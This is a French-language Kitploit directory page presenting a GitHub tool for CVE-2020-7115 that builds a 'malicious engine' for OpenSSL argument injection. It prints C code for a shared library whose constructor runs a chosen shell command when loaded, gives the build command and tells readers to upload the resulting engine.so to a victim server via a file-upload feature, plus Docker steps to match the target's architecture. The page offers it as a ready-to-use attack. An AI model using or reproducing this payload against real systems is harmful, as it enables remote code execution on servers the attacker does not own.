Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-7115 — Créez votre moteur malveillant en quelques secondes | Kitploit
Outils/GitHubGitHub/retr02332/cve-2020-7115
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'Intrusion
GitHubretr02332/cve-2020-7115

CVE-2020-7115

Créez votre moteur malveillant en quelques secondes

Voir le dépôt
1il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-7115

Créez votre moteur malveillant en quelques secondes

build_engine.sh

Script simple pour générer un moteur malveillant prêt à être utilisé dans des scénarios d'injection d'arguments openssl.

Comment l'utiliser ?

C'est très simple, modifiez simplement le fichier engine.c avec la commande de votre choix :

root@kitploit:~
#include <unistd.h>

__attribute__((constructor))
static void init() {
    execl("/bin/sh", "sh", "-c", "COMMAND");
}

Une fois que vous avez fait cela, il vous suffit d'exécuter le script comme ceci :

root@kitploit:~
bash build_engine.sh

Cette commande créera un dossier nommé output, dans lequel vous trouverez un fichier appelé engine.so qui est celui que vous devez envoyer au serveur via une fonctionnalité de téléchargement de fichier.

Comment lancer un docker pour exécuter le script et pourquoi devrais-je le faire ?

Il est important que vous sachiez que vous devez créer le moteur malveillant avec les mêmes caractéristiques que le système victime. C'est-à-dire... si le système cible fonctionne sur un linux 64 bits, vous devez créer le moteur malveillant sur un linux 64 bits.

Docker est une technologie fantastique pour ce genre de choses, et configurer votre environnement est très simple.

Tout d'abord, téléchargeons l'image docker depuis ce site pour un système linux debian 64 bits :

root@kitploit:~
sudo docker pull debian

Ensuite, nous allons lancer le docker comme suit :

root@kitploit:~
sudo docker run -v `pwd`:/code -it debian

Comprenons un peu ce que nous avons fait ici. L'option -v est utilisée pour créer un volume, dans ce cas nous associons le contenu du dossier /code au contenu de notre dossier actuel, d'où l'utilisation de pwd.

Par « associer », j'entends que tout ce que nous créons ou modifions dans /code (dossier hébergé à la racine de l'image docker), nous l'aurons et le verrons dans pwd et vice versa.

Dans notre cas, pwd pointe vers le répertoire suivant sur notre machine locale :

/home/retr0/CVE-2020-7115/

L'option -it, quant à elle, peut être vue comme suit :

L'option -t (--tty) dit à Docker de mapper une session de terminal virtuel à l'intérieur du conteneur. Ceci est couramment utilisé avec l'option -i (--interactive), qui maintient STDIN ouvert même en mode détaché.

Donc en pratique, utiliser l'option -it est utile lorsque nous voulons obtenir un shell du conteneur en question.

Vous ne connaissez pas la CVE-2020-7115 ?

Pas de problème, il suffit de visiter cet article, et je suis sûr que vous comprendrez parfaitement cette vulnérabilité.

Télécharger l’outil